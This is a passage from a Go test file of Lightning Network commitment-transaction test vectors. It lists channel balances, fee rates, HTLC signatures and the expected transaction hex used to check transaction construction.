0,\n\t\t\t\t\tremoteSigHex: \"30440220385a5afe75632f50128cbb029ee95c80156b5b4744beddc729ad339c9ca432c802202ba5f48550cad3379ac75b9b4fedb86a35baa6947f16ba5037fb8b11ab343740\",\n\t\t\t\t\tresolutionTxHex: \"020000000001018323148ce2419f21ca3d6780053747715832e18ac780931a514b187768882bb60000000000000000000122020000000000002200204adb4e2f00643db396dd120d4e7dc17625f5f2c11a40d857accc862d6b7dd80e05004730440220385a5afe75632f50128cbb029ee95c80156b5b4744beddc729ad339c9ca432c802202ba5f48550cad3379ac75b9b4fedb86a35baa6947f16ba5037fb8b11ab3437400147304402205999590b8a79fa346e003a68fd40366397119b2b0cdf37b149968d6bc6fbcc4702202b1e1fb5ab7864931caed4e732c359e0fe3d86a548b557be2246efb1708d579a012000000000000000000000000000000000000000000000000000000000000000008a76a91414011f7254d96b819c76986c277d115efce6f7b58763ac67210394854aa6eab5b2a8122cc726e9dded053a2184d88256816826d6231c068d4a5b7c8201208763a914b8bcb07f6344b42ab04250c86a6e8b75d3fdbbc688527c21030d417a46946384f88d5f3337267c5e579765875dc4daca813e21734b140639e752ae677502f401b175ac686800000000\",\n\t\t\t\t},\n\t\t\t\t{\n\t\t\t\t\tindex: 2,\n\t\t\t\t\tremoteSigHex: \"304402207ceb6678d4db33d2401fdc409959e57c16a6cb97a30261d9c61f29b8c58d34b90220084b4a17b4ca0e86f2d798b3698ca52de5621f2ce86f80bed79afa66874511b0\",\n\t\t\t\t\tresolutionTxHex: \"020000000001018323148ce2419f21ca3d6780053747715832e18ac780931a514b187768882bb60100000000000000000124060000000000002200204adb4e2f00643db396dd120d4e7dc17625f5f2c11a40d857accc862d6b7dd80e050047304402207ceb6678d4db33d2401fdc409959e57c16a6cb97a30261d9c61f29b8c58d34b90220084b4a17b4ca0e86f2d798b3698ca52de5621f2ce86f80bed79afa66874511b00147304402207ff03eb0127fc7c6cae49cc29e2a586b98d1e8969cf4a17dfa50b9c2647720b902205e2ecfda2252956c0ca32f175080e75e4e390e433feb1f8ce9f2ba55648a1dac01008576a91414011f7254d96b819c76986c277d115efce6f7b58763ac67210394854aa6eab5b2a8122cc726e9dded053a2184d88256816826d6231c068d4a5b7c820120876475527c21030d417a46946384f88d5f3337267c5e579765875dc4daca813e21734b140639e752ae67a914b43e1b38138a41b37f7cd9a1d274bc63e3a9b5d188ac6868f6010000\",\n\t\t\t\t},\n\t\t\t\t{\n\t\t\t\t\tindex: 1,\n\t\t\t\t\tremoteSigHex: \"304402206a401b29a0dff0d18ec903502c13d83e7ec019450113f4a7655a4ce40d1f65ba0220217723a084e727b6ca0cc8b6c69c014a7e4a01fcdcba3e3993f462a3c574d833\",\n\t\t\t\t\tresolutionTxHex: \"020000000001018323148ce2419f21ca3d6780053747715832e18ac780931a514b187768882bb6020000000000000000010a060000000000002200204adb4e2f00643db396dd120d4e7dc17625f5f2c11a40d857accc862d6b7dd80e050047304402206a401b29a0dff0d18ec903502c13d83e7ec019450113f4a7655a4ce40d1f65ba0220217723a084e727b6ca0cc8b6c69c014a7e4a01fcdcba3e3993f462a3c574d83301483045022100d50d067ca625d54e62df533a8f9291736678d0b86c28a61bb2a80cf42e702d6e02202373dde7e00218eacdafb9415fe0e1071beec1857d1af3c6a201a44cbc47c877012001010101010101010101010101010101010101010101010101010101010101018a76a91414011f7254d96b819c76986c277d115efce6f7b58763ac67210394854aa6eab5b2a8122cc726e9dded053a2184d88256816826d6231c068d4a5b7c8201208763a9144b6b2e5444c2639cc0fb7bcea5afba3f3cdce23988527c21030d417a46946384f88d5f3337267c5e579765875dc4daca813e21734b140639e752ae677502f501b175ac686800000000\",\n\t\t\t\t},\n\t\t\t\t{\n\t\t\t\t\tindex: 3,\n\t\t\t\t\tremoteSigHex: \"30450221009b1c987ba599ee3bde1dbca776b85481d70a78b681a8d84206723e2795c7cac002207aac84ad910f8598c4d1c0ea2e3399cf6627a4e3e90131315bc9f038451ce39d\",\n\t\t\t\t\tresolutionTxHex: \"020000000001018323148ce2419f21ca3d6780053747715832e18ac780931a514b187768882bb6030000000000000000010c0a0000000000002200204adb4e2f00643db396dd120d4e7dc17625f5f2c11a40d857accc862d6b7dd80e05004830450221009b1c987ba599ee3bde1dbca776b85481d70a78b681a8d84206723e2795c7cac002207aac84ad910f8598c4d1c0ea2e3399cf6627a4e3e90131315bc9f038451ce39d01483045022100db9dc65291077a52728c622987e9895b7241d4394d6dcb916d7600a3e8728c22022036ee3ee717ba0bb5c45ee84bc7bbf85c0f90f26ae4e4a25a6b4241afa8a3f1cb01008576a91414011f7254d96b819c76986c277d115efce6f7b58763ac67210394854aa6eab5b2a8122cc726e9dded053a2184d88256816826d6231c068d4a5b7c820120876475527c21030d417a46946384f88d5f3337267c5e579765875dc4daca813e21734b140639e752ae67a9148a486ff2e31d6158bf39e2608864d63fefd09d5b88ac6868f7010000\",\n\t\t\t\t},\n\t\t\t\t{\n\t\t\t\t\tindex: 4,\n\t\t\t\t\tremoteSigHex: \"3045022100cc28030b59f0914f45b84caa983b6f8effa900c952310708c2b5b00781117022022027ba2ccdf94d03c6d48b327f183f6e28c8a214d089b9227f94ac4f85315274f0\",\n\t\t\t\t\tresolutionTxHex: \"020000000001018323148ce2419f21ca3d6780053747715832e18ac780931a514b187768882bb604000000000000000001da0d0000000000002200204adb4e2f00643db396dd120d4e7dc17625f5f2c11a40d857accc862d6b7dd80e0500483045022100cc28030b59f0914f45b84caa983b6f8effa900c952310708c2b5b00781117022022027ba2ccdf94d03c6d48b327f183f6e28c8a214d089b9227f94ac4f85315274f00147304402202d1a3c0d31200265d2a2def2753ead4959ae20b4083e19553acfffa5dfab60bf022020ede134149504e15b88ab261a066de49848411e15e70f9e6a5462aec2949f8f012004040404040404040404040404040404040404040404040404040404040404048a76a91414011f7254d96b819c76986c277d115efce6f7b58763ac67210394854aa6eab5b2a8122cc726e9dded053a2184d88256816826d6231c068d4a5b7c8201208763a91418bc1a114ccf9c052d3d23e28d3b0a9d1227434288527c21030d417a46946384f88d5f3337267c5e579765875dc4daca813e21734b140639e752ae677502f801b175ac686800000000\",\n\t\t\t\t},\n\t\t\t},\n\t\t\texpectedCommitmentTxHex: \"02000000000101bef67e4e2fb9ddeeb3461973cd4c62abb35050b1add772995b820b584a488489000000000038b02b8007e80300000000000022002052bfef0479d7b293c27e0f1eb294bea154c63a3294ef092c19af51409bce0e2ad007000000000000220020403d394747cae42e98ff01734ad5c08f82ba123d3d9a620abda88989651e2ab5d007000000000000220020748eba944fedc8827f6b06bc44678f93c0f9e6078b35c6331ed31e75f8ce0c2db80b000000000000220020c20b5d1f8584fd90443e7b7b720136174fa4b9333c261d04dbbd012635c0f419a00f0000000000002200208c48d15160397c9731df9bc3b236656efb6665fbfe92b4a6878e88a499f741c4c0c62d0000000000160014ccf1af2f2aabee14bb40fa3851ab2301de843110e09c6a00000000002200204adb4e2f00643db396dd120d4e7dc17625f5f2c11a40d857accc862d6b7dd80e040048304502210094bfd8f5572ac0157ec76a9551b6c5216a4538c07cd13a51af4a54cb26fa14320220768efce8ce6f4a5efac875142ff19237c011343670adf9c7ac69704a120d116301483045022100a5c01383d3ec646d97e40f44318d49def817fcd61a0ef18008a665b3e151785502203e648efddd5838981ef55ec954be69c4a652d021e6081a100d034de366815e9b01475221023da092f6980e58d2c037173180e9a465476026ee50f96695963e8efe436f54eb21030e9f7b623d2ccc7c9bd44d66d5ce21ce504c0acf6385a132cec6d3c39fa711c152ae3e195220\",\n\t\t\tremoteSigHex: \"3045022100a5c01383d3ec646d97e40f44318d49def817fcd61a0ef18008a665b3e151785502203e648efddd5838981ef55ec954be69c4a652d021e6081a100d034de366815e9b\",\n\t\t},\n\t\t{\n\t\t\tcommitment: channeldb.ChannelCommitment{\n\t\t\t\tCommitHeight: 42,\n\t\t\t\tLocalBalance: 6988000000,\n\t\t\t\tRemoteBalance: 3000000000,\n\t\t\t\tFeePerKw: 648,\n\t\t\t},\n\t\t\thtlcDescs: []htlcDesc{\n\t\t\t\t{\n\t\t\t\t\tindex: 2,\n\t\t\t\t\tremoteSigHex: \"3044022062ef2e77591409d60d7817d9bb1e71d3c4a2931d1a6c7c8307422c84f001a251022022dad9726b0ae3fe92bda745a06f2c00f92342a186d84518588cf65f4dfaada8\",\n\t\t\t\t\tresolutionTxHex: \"02000000000101579c183eca9e8236a5d7f5dcd79cfec32c497fdc0ec61533cde99ecd436cadd10000000000000000000123060000000000002200204adb4e2f00643db396dd120d4e7dc17625f5f2c11a40d857accc862d6b7dd80e0500473044022062ef2e77591409d60d7817d9bb1e71d3c4a2931d1a6c7c8307422c84f001a251022022dad9726b0ae3fe92bda745a06f2c00f92342a186d84518588cf65f4dfaada801483045022100a4c574f00411dd2f978ca5cdc1b848c311cd7849c087ad2f21a5bce5e8cc5ae90220090ae39a9bce2fb8bc879d7e9f9022df249f41e25e51f1a9bf6447a9eeffc09801008576a91414011f7254d96b819c76986c277d115efce6f7b58763ac67210394854aa6eab5b2a8122cc726e9dded053a2184d88256816826d6231c068d4a5b7c820120876475527c21030d417a46946384f88d5f3337267c5e579765875dc4daca813e21734b140639e752ae67a914b43e1b38138a41b37f7cd9a1d274bc63e3a9b5d188ac6868f6010000\",\n\t\t\t\t},\n\t\t\t\t{\n\t\t\t\t\tindex: 1,\n\t\t\t\t\tremoteSigHex: \"3045022100e968cbbb5f402ed389fdc7f6cd2a80ed650bb42c79aeb2a5678444af94f6c78502204b47a1cb24ab5b0b6fe69fe9cfc7dba07b9dd0d8b95f372c1d9435146a88f8d4\",\n\t\t\t\t\tresolutionTxHex: \"02000000000101579c183eca9e8236a5d7f5dcd79cfec32c497fdc0ec61533cde99ecd436cadd10100000000000000000109060000000000002200204adb4e2f00643db396dd120d4e7dc17625f5f2c11a40d857accc862d6b7dd80e0500483045022100e968cbbb5f402ed389fdc7f6cd2a80ed650bb42c79aeb2a5678444af94f6c78502204b47a1cb24ab5b0b6fe69fe9cfc7dba07b9dd0d8b95f372c1d9435146a88f8d40147304402207679cf19790bea76a733d2fa0672bd43ab455687a068f815a3d237581f57139a0220683a1a799e102071c206b207735ca80f627ab83d6616b4bcd017c5d79ef3e7d0012001010101010101010101010101010101010101010101010101010101010101018a76a91414011f7254d96b819c76986c277d115efce6f7b58763ac67210394854aa6eab5b2a8122cc726e9dded053a2184d88256816826d6231c068d4a5b7c8201208763a9144b6b2e5444c2639cc0fb7bcea5afba3f3cdce23988527c21030d417a46946384f88d5f3337267c5e579765875dc4daca813e21734b140639e752ae677502f501b175ac686800000000\",\n\t\t\t\t},\n\t\t\t\t{\n\t\t\t\t\tindex: 3,\n\t\t\t\t\tremoteSigHex: \"3045022100aa91932e305292cf9969cc23502bbf6cef83a5df39c95ad04a707c4f4fed5c7702207099fc0f3a9bfe1e7683c0e9aa5e76c5432eb20693bf4cb182f04d383dc9c8c2\",\n\t\t\t\t\tresolutionTxHex: \"02000000000101579c183eca9e8236a5d7f5dcd79cfec32c497fdc0ec61533cde99ecd436cadd1020000000000000000010b0a0000000000002200204adb4e2f00643db396dd120d4e7dc17625f5f2c11a40d857accc862d6b7dd80e0500483045022100aa91932e305292cf9969cc23502bbf6cef83a5df39c95ad04a707c4f4fed5c7702207099fc0f3a9bfe1e7683c0e9aa5e76c5432eb20693bf4cb182f04d383dc9c8c20147304402200df76fea718745f3c529bac7fd37923e7309ce38b25c0781e4cf514dd9ef8dc802204172295739dbae9fe0474dcee3608e3433b4b2af3a2e6787108b02f894dcdda301008576a91414011f7254d96b819c76986c277d115efce6f7b58763ac67210394854aa6eab5b2a8122cc726e9dded053a2184d88256816826d6231c068d4a5b7c820120876475527c21030d417a46946384f88d5f3337267c5e579765875dc4daca813e21734b140639e752ae67a9148a486ff2e31d6158bf39e2608864d63fefd09d5b88ac6868f7010000\",\n\t\t\t\t},\n\t\t\t\t{\n\t\t\t\t\tindex: 4,\n\t\t\t\t\tremoteSigHex: \"3044022035cac88040a5bba420b1c4257235d5015309113460bc33f2853cd81ca36e632402202fc94fd3e81e9d34a9d01782a0284f3044370d03d60f3fc041e2da088d2de58f\",\n\t\t\t\t\tresolutionTxHex: \"02000000000101579c183eca9e8236a5d7f5dcd79cfec32c497fdc0ec61533cde99ecd436cadd103000000000000000001d90d0000000000002200204adb4e2f00643db396dd120d4e7dc17625f5f2c11a40d857accc862d6b7dd80e0500473044022035cac88040a5bba420b1c4257235d5015309113460bc33f2853cd81ca36e632402202fc94fd3e81e9d34a9d01782a0284f3044370d03d60f3fc041e2da088d2de58f0147304402200daf2eb7afd355b4caf6fb08387b5f031940ea29d1a9f35071288a839c9039e4022067201b562456e7948616c13acb876b386b511599b58ac1d94d127f91c50463a6012004040404040404040404040404040404040404040404040404040404040404048a76a91414011f7254d96b819c76986c277d115efce6f7b58763ac67210394854aa6eab5b2a8122cc726e9dded053a2184d88256816826d6231c068d4a5b7c8201208763a91418bc1a114ccf9c052d3d23e28d3b0a9d1227434288527c21030d417a46946384f88d5f3337267c5e579765875dc4daca813e21734b140639e752ae677502f801b175ac686800000000\",\n\t\t\t\t},\n\t\t\t},\n\t\t\texpectedCommitmentTxHex: \"02000000000101bef67e4e2fb9ddeeb3461973cd4c62abb35050b1add772995b820b584a488489000000000038b02b8006d007000000000000220020403d394747cae42e98ff01734ad5c08f82ba123d3d9a620abda88989651e2ab5d007000000000000220020748eba944fedc8827f6b06bc44678f93c0f9e6078b35c6331ed31e75f8ce0c2db80b000000000000220020c20b5d1f8584fd90443e7b7b720136174fa4b9333c261d04dbbd012635c0f419a00f0000000000002200208c48d15160397c9731df9bc3b236656efb6665fbfe92b4a6878e88a499f741c4c0c62d0000000000160014ccf1af2f2aabee14bb40fa3851ab2301de8431104e9d6a00000000002200204adb4e2f00643db396dd120d4e7dc17625f5f2c11a40d857accc862d6b7dd80e0400483045022100a2270d5950c89ae0841233f6efea9c951898b301b2e89e0adbd2c687b9f32efa02207943d90f95b9610458e7c65a576e149750ff3accaacad004cd85e70b235e27de01473044022072714e2fbb93cdd1c42eb0828b4f2eff143f717d8f26e79d6ada4f0dcb681bbe02200911be4e5161dd6ebe59ff1c58e1997c4aea804f81db6b698821db6093d7b05701475221023da092f6980e58d2c037173180e9a465476026ee50f96695963e8efe436f54eb21030e9f7b623d2ccc7c9bd44d66d5ce21ce504c0acf6385a132cec6d3c39fa711c152ae3e195220\",\n\t\t\tremoteSigHex: \"3044022072714e2fbb93cdd1c42eb0828b4f2eff143f717d8f26e79d6ada4f0dcb681bbe02200911be4e5161dd6ebe59ff1c58e1997c4aea804f81db6b698821db6093d7b057\",\n\t\t},\n\t\t{\n\t\t\tcommitment: channeldb.ChannelCommitment{\n\t\t\t\tCommitHeight: 42,\n\t\t\t\tLocalBalance: 6988000000,\n\t\t\t\tRemoteBalance: 3000000000,\n\t\t\t\tFeePerKw: 2069,\n\t\t\t},\n\t\t\thtlcDescs: []htlcDesc{\n\t\t\t\t{\n\t\t\t\t\tindex: 2,\n\t\t\t\t\tremoteSigHex: \"3045022100d1cf354de41c1369336cf85b225ed033f1f8982a01be503668df756a7e668b66022001254144fb4d0eecc61908fccc3388891ba17c5d7a1a8c62bdd307e5a513f992\",\n\t\t\t\t\tresolutionTxHex: \"02000000000101ca94a9ad516ebc0c4bdd7b6254871babfa978d5accafb554214137d398bfcf6a0000000000000000000175020000000000002200204adb4e2f00643db396dd120d4e7dc17625f5f2c11a40d857accc862d6b7dd80e0500483045022100d1cf354de41c1369336cf85b225ed033f1f8982a01be503668df756a7e668b66022001254144fb4d0eecc61908fccc3388891ba17c5d7a1a8c62bdd307e5a513f99201473044022056eb1af429660e45a1b0b66568cb8c4a3aa7e4c9c292d5d6c47f86ebf2c8838f022065c3ac4ebe980ca7a41148569be4ad8751b0a724a41405697ec55035dae6640201008576a91414011f7254d96b819c76986c277d115efce6f7b58763ac67210394854aa6eab5b2a8122cc726e9dded053a2184d88256816826d6231c068d4a5b7c820120876475527c21030d417a46946384f88d5f3337267c5e579765875dc4daca813e21734b140639e752ae67a914b43e1b38138a41b37f7cd9a1d274bc63e3a9b5d188ac6868f6010000\",\n\t\t\t\t},\n\t\t\t\t{\n\t\t\t\t\tindex: 1,\n\t\t\t\t\tremoteSigHex: \"3045022100d065569dcb94f090345402736385efeb8ea265131804beac06dd84d15dd2d6880220664feb0b4b2eb985fadb6ec7dc58c9334ea88ce599a9be760554a2d4b3b5d9f4\",\n\t\t\t\t\tresolutionTxHex: \"02000000000101ca94a9ad516ebc0c4bdd7b6254871babfa978d5accafb554214137d398bfcf6a0100000000000000000122020000000000002200204adb4e2f00643db396dd120d4e7dc17625f5f2c11a40d857accc862d6b7dd80e0500483045022100d065569dcb94f090345402736385efeb8ea265131804beac06dd84d15dd2d6880220664feb0b4b2eb985fadb6ec7dc58c9334ea88ce599a9be760554a2d4b3b5d9f401483045022100914bb232cd4b2690ee3d6cb8c3713c4ac9c4fb925323068d8b07f67c8541f8d9022057152f5f1615b793d2d45aac7518989ae4fe970f28b9b5c77504799d25433f7f012001010101010101010101010101010101010101010101010101010101010101018a76a91414011f7254d96b819c76986c277d115efce6f7b58763ac67210394854aa6eab5b2a8122cc726e9dded053a2184d88256816826d6231c068d4a5b7c8201208763a9144b6b2e5444c2639cc0fb7bcea5afba3f3cdce23988527c21030d417a46946384f88d5f3337267c5e579765875dc4daca813e21734b140639e752ae677502f501b175ac686800000000\",\n\t\t\t\t},\n\t\t\t\t{\n\t\t\t\t\tindex: 3,\n\t\t\t\t\tremoteSigHex: \"3045022100d4e69d363de993684eae7b37853c40722a4c1b4a7b588ad7b5d8a9b5006137a102207a069c628170ee34be5612747051bdcc087466dbaa68d5756ea81c10155aef18\",\n\t\t\t\t\tresolutionTxHex: \"02000000000101ca94a9ad516ebc0c4bdd7b6254871babfa978d5accafb554214137d398bfcf6a020000000000000000015d060000000000002200204adb4e2f00643db396dd120d4e7dc17625f5f2c11a40d857accc862d6b7dd80e0500483045022100d4e69d363de993684eae7b37853c40722a4c1b4a7b588ad7b5d8a9b5006137a102207a069c628170ee34be5612747051bdcc087466dbaa68d5756ea81c10155aef180147304402200e362443f7af830b419771e8e1614fc391db3a4eb799989abfc5ab26d6fcd032022039ab0cad1c14dfbe9446bf847965e56fe016e0cbcf719fd18c1bfbf53ecbd9f901008576a91414011f7254d96b819c76986c277d115efce6f7b58763ac67210394854aa6eab5b2a8122cc726e9dded053a2184d88256816826d6231c068d4a5b7c820120876475527c21030d417a46946384f88d5f3337267c5e579765875dc4daca813e21734b140639e752ae67a9148a486ff2e31d6158bf39e2608864d63fefd09d5b88ac6868f7010000\",\n\t\t\t\t},\n\t\t\t\t{\n\t\t\t\t\tindex: 4,\n\t\t\t\t\tremoteSigHex: \"30450221008ec888e36e4a4b3dc2ed6b823319855b2ae03006ca6ae0d9aa7e24bfc1d6f07102203b0f78885472a67ff4fe5916c0bb669487d659527509516fc3a08e87a2cc0a7c\",\n\t\t\t\t\tresolutionTxHex: \"02000000000101ca94a9ad516ebc0c4bdd7b6254871babfa978d5accafb554214137d398bfcf6a03000000000000000001f2090000000000002200204adb4e2f00643db396dd120d4e7dc17625f5f2c11a40d857accc862d6b7dd80e05004830450221008ec888e36e4a4b3dc2ed6b823319855b2ae03006ca6ae0d9aa7e24bfc1d6f07102203b0f78885472a67ff4fe5916c0bb669487d659527509516fc3a08e87a2cc0a7c0147304402202c3e14282b84b02705dfd00a6da396c9fe8a8bcb1d3fdb4b20a4feba09440e8b02202b058b39aa9b0c865b22095edcd9ff1f71bbfe20aa4993755e54d042755ed0d5012004040404040404040404040404040404040404040404040404040404040404048a76a91414011f7254d96b819c76986c277d115efce6f7b58763ac67210394854aa6eab5b2a8122cc726e9dded053a2184d88256816826d6231c068d4a5b7c8201208763a91418bc1a114ccf9c052d3d23e28d3b0a9d1227434288527c21030d417a46946384f88d5f3337267c5e579765875dc4daca813e21734b140639e752ae677502f801b175ac686800000000\",\n\t\t\t\t},\n\t\t\t},\n\t\t\texpectedCommitmentTxHex: \"02000000000101bef67e4e2fb9ddeeb3461973cd4c62abb35050b1add772995b820b584a488489000000000038b02b8006d007000000000000220020403d394747cae42e98ff01734ad5c08f82ba123d3d9a620abda88989651e2ab5d007000000000000220020748eba944fedc8827f6b06bc44678f93c0f9e6078b35c6331ed31e75f8ce0c2db80b000000000000220020c20b5d1f8584fd90443e7b7b720136174fa4b9333c261d04dbbd012635c0f419a00f0000000000002200208c48d15160397c9731df9bc3b236656efb6665fbfe92b4a6878e88a499f741c4c0c62d0000000000160014ccf1af2f2aabee14bb40fa3851ab2301de84311077956a00000000002200204adb4e2f00643db396dd120d4e7dc17625f5f2c11a40d857accc862d6b7dd80e040047304402203ca8f31c6a47519f83255dc69f1894d9a6d7476a19f498d31eaf0cd3a85eeb63022026fd92dc752b33905c4c838c528b692a8ad4ced959990b5d5ee2ff940fa90eea01473044022001d55e488b8b035b2dd29d50b65b530923a416d47f377284145bc8767b1b6a75022019bb53ddfe1cefaf156f924777eaaf8fdca1810695a7d0a247ad2afba8232eb401475221023da092f6980e58d2c037173180e9a465476026ee50f96695963e8efe436f54eb21030e9f7b623d2ccc7c9bd44d66d5ce21ce504c0acf6385a132cec6d3c39fa711c152ae3e195220\",\n\t\t\tremoteSigHex: \"3044022001d55e488b8b035b2dd29d50b65b530923a416d47f377284145bc8767b1b6a75022019bb53ddfe1cefaf156f924777eaaf8fdca1810695a7d0a247ad2afba8232eb4\",\n\t\t},\n\t\t{\n\t\t\tcommitment: channeldb.ChannelCommitment{\n\t\t\t\tCommitHeight: 42,\n\t\t\t\tLocalBalance: 6988000000,\n\t\t\t\tRemoteBalance: 3000000000,\n\t\t\t\tFeePerKw: 2070,\n\t\t\t},\n\t\t\thtlcDescs: []htlcDesc{\n\t\t\t\t{\n\t\t\t\t\tindex: 2,\n\t\t\t\t\tremoteSigHex: \"3045022100eed143b1ee4bed5dc3cde40afa5db3e7354cbf9c44054b5f713f729356f08cf7022077161d171c2bbd9badf3c9934de65a4918de03bbac1450f715275f75b103f891\",\n\t\t\t\t\tresolutionTxHex: \"0200000000010140a83ce364747ff277f4d7595d8d15f708418798922c40bc2b056aca5485a2180000000000000000000174020000000000002200204adb4e2f00643db396dd120d4e7dc17625f5f2c11a40d857accc862d6b7dd80e0500483045022100eed143b1ee4bed5dc3cde40afa5db3e7354cbf9c44054b5f713f729356f08cf7022077161d171c2bbd9badf3c9934de65a4918de03bbac1450f715275f75b103f89101483045022100a0d043ed533e7fb1911e0553d31a8e2f3e6de19dbc035257f29d747c5e02f1f5022030cd38d8e84282175d49c1ebe0470db3ebd59768cf40780a784e248a43904fb801008576a91414011f7254d96b819c76986c277d115efce6f7b58763ac67210394854aa6eab5b2a8122cc726e9dded053a2184d88256816826d6231c068d4a5b7c820120876475527c21030d417a46946384f88d5f3337267c5e579765875dc4daca813e21734b140639e752ae67a914b43e1b38138a41b37f7cd9a1d274bc63e3a9b5d188ac6868f6010000\",\n\t\t\t\t},\n\t\t\t\t{\n\t\t\t\t\tindex: 3,\n\t\t\t\t\tremoteSigHex: \"3044022071e9357619fd8d29a411dc053b326a5224c5d11268070e88ecb981b174747c7a02202b763ae29a9d0732fa8836dd8597439460b50472183f420021b768981b4f7cf6\",\n\t\t\t\t\tresolutionTxHex: \"0200000000010140a83ce364747ff277f4d7595d8d15f708418798922c40bc2b056aca5485a218010000000000000000015c060000000000002200204adb4e2f00643db396dd120d4e7dc17625f5f2c11a40d857accc862d6b7dd80e0500473044022071e9357619fd8d29a411dc053b326a5224c5d11268070e88ecb981b174747c7a02202b763ae29a9d0732fa8836dd8597439460b50472183f420021b768981b4f7cf601483045022100adb1d679f65f96178b59f23ed37d3b70443118f345224a07ecb043eee2acc157022034d24524fe857144a3bcfff3065a9994d0a6ec5f11c681e49431d573e242612d01008576a91414011f7254d96b819c76986c277d115efce6f7b58763ac67210394854aa6eab5b2a8122cc726e9dded053a2184d88256816826d6231c068d4a5b7c820120876475527c21030d417a46946384f88d5f3337267c5e579765875dc4daca813e21734b140639e752ae67a9148a486ff2e31d6158bf39e2608864d63fefd09d5b88ac6868f7010000\",\n\t\t\t\t},\n\t\t\t\t{\n\t\t\t\t\tindex: 4,\n\t\t\t\t\tremoteSigHex: \"3045022100c9458a4d2cbb741705577deb0a890e5cb90ee141be0400d3162e533727c9cb2102206edcf765c5dc5e5f9b976ea8149bf8607b5a0efb30691138e1231302b640d2a4\",\n\t\t\t\t\tresolutionTxHex: \"0200000000010140a83ce364747ff277f4d7595d8d15f708418798922c40bc2b056aca5485a21802000000000000000001f1090000000000002200204adb4e2f00643db396dd120d4e7dc17625f5f2c11a40d857accc862d6b7dd80e0500483045022100c9458a4d2cbb741705577deb0a890e5cb90ee141be0400d3162e533727c9cb2102206edcf765c5dc5e5f9b976ea8149bf8607b5a0efb30691138e1231302b640d2a40147304402200831422aa4e1ee6d55e0b894201770a8f8817a189356f2d70be76633ffa6a6f602200dd1b84a4855dc6727dd46c98daae43dfc70889d1ba7ef0087529a57c06e5e04012004040404040404040404040404040404040404040404040404040404040404048a76a91414011f7254d96b819c76986c277d115efce6f7b58763ac67210394854aa6eab5b2a8122cc726e9dded053a2184d88256816826d6231c068d4a5b7c8201208763a91418bc1a114ccf9c052d3d23e28d3b0a9d1227434288527c21030d417a46946384f88d5f3337267c5e579765875dc4daca813e21734b140639e752ae677502f801b175ac686800000000\",\n\t\t\t\t},\n\t\t\t},\n\t\t\texpectedCommitmentTxHex: \"02000000000101bef67e4e2fb9ddeeb3461973cd4c62abb35050b1add772995b820b584a488489000000000038b02b8005d007000000000000220020403d394747cae42e98ff01734ad5c08f82ba123d3d9a620abda88989651e2ab5b80b000000000000220020c20b5d1f8584fd90443e7b7b720136174fa4b9333c261d04dbbd012635c0f419a00f0000000000002200208c48d15160397c9731df9bc3b236656efb6665fbfe92b4a6878e88a499f741c4c0c62d0000000000160014ccf1af2f2aabee14bb40fa3851ab2301de843110da966a00000000002200204adb4e2f00643db396dd120d4e7dc17625f5f2c11a40d857accc862d6b7dd80e04004730440220443cb07f650aebbba14b8bc8d81e096712590f524c5991ac0ed3bbc8fd3bd0c7022028a635f548e3ca64b19b69b1ea00f05b22752f91daf0b6dab78e62ba52eb7fd001483045022100f2377f7a67b7fc7f4e2c0c9e3a7de935c32417f5668eda31ea1db401b7dc53030220415fdbc8e91d0f735e70c21952342742e25249b0d062d43efbfc564499f3752601475221023da092f6980e58d2c037173180e9a465476026ee50f96695963e8efe436f54eb21030e9f7b623d2ccc7c9bd44d66d5ce21ce504c0acf6385a132cec6d3c39fa711c152ae3e195220\",\n\t\t\tremoteSigHex: \"3045022100f2377f7a67b7fc7f4e2c0c9e3a7de935c32417f5668eda31ea1db401b7dc53030220415fdbc8e91d0f735e70c21952342742e25249b0d062d43efbfc564499f37526\",\n\t\t},\n\t\t{\n\t\t\tcommitment: channeldb.ChannelCommitment{\n\t\t\t\tCommitHeight: 42,\n\t\t\t\tLocalBalance: 6988000000,\n\t\t\t\tRemoteBalance: 3000000000,\n\t\t\t\tFeePerKw: 2194,\n\t\t\t},\n\t\t\thtlcDescs: []htlcDesc{\n\t\t\t\t{\n\t\t\t\t\tindex: 2,\n\t\t\t\t\tremoteSigHex: \"30450221009ed2f0a67f99e29c3c8cf45c08207b765980697781bb727fe0b1416de0e7622902206052684229bc171419ed290f4b615c943f819c0262414e43c5b91dcf72ddcf44\",\n\t\t\t\t\tresolutionTxHex: \"02000000000101fb824d4e4dafc0f567789dee3a6bce8d411fe80f5563d8cdfdcc7d7e4447d43a0000000000000000000122020000000000002200204adb4e2f00643db396dd120d4e7dc17625f5f2c11a40d857accc862d6b7dd80e05004830450221009ed2f0a67f99e29c3c8cf45c08207b765980697781bb727fe0b1416de0e7622902206052684229bc171419ed290f4b615c943f819c0262414e43c5b91dcf72ddcf4401473044022004ad5f04ae69c71b3b141d4db9d0d4c38d84009fb3cfeeae6efdad414487a9a0022042d3fe1388c1ff517d1da7fb4025663d372c14728ed52dc88608363450ff6a2f01008576a91414011f7254d96b819c76986c277d115efce6f7b58763ac67210394854aa6eab5b2a8122cc726e9dded053a2184d88256816826d6231c068d4a5b7c820120876475527c21030d417a46946384f88d5f3337267c5e579765875dc4daca813e21734b140639e752ae67a914b43e1b38138a41b37f7cd9a1d274bc63e3a9b5d188ac6868f6010000\",\n\t\t\t\t},\n\t\t\t\t{\n\t\t\t\t\tindex: 3,\n\t\t\t\t\tremoteSigHex: \"30440220155d3b90c67c33a8321996a9be5b82431b0c126613be751d400669da9d5c696702204318448bcd48824439d2c6a70be6e5747446be47ff45977cf41672bdc9b6b12d\",\n\t\t\t\t\tresolutionTxHex: \"02000000000101fb824d4e4dafc0f567789dee3a6bce8d411fe80f5563d8cdfdcc7d7e4447d43a010000000000000000010a060000000000002200204adb4e2f00643db396dd120d4e7dc17625f5f2c11a40d857accc862d6b7dd80e05004730440220155d3b90c67c33a8321996a9be5b82431b0c126613be751d400669da9d5c696702204318448bcd48824439d2c6a70be6e5747446be47ff45977cf41672bdc9b6b12d0147304402201707050c870c1f77cc3ed58d6d71bf281de239e9eabd8ef0955bad0d7fe38dcc02204d36d80d0019b3a71e646a08fa4a5607761d341ae8be371946ebe437c289c91501008576a91414011f7254d96b819c76986c277d115efce6f7b58763ac67210394854aa6eab5b2a8122cc726e9dded053a2184d88256816826d6231c068d4a5b7c820120876475527c21030d417a46946384f88d5f3337267c5e579765875dc4daca813e21734b140639e752ae67a9148a486ff2e31d6158bf39e2608864d63fefd09d5b88ac6868f7010000\",\n\t\t\t\t},\n\t\t\t\t{\n\t\t\t\t\tindex: 4,\n\t\t\t\t\tremoteSigHex: 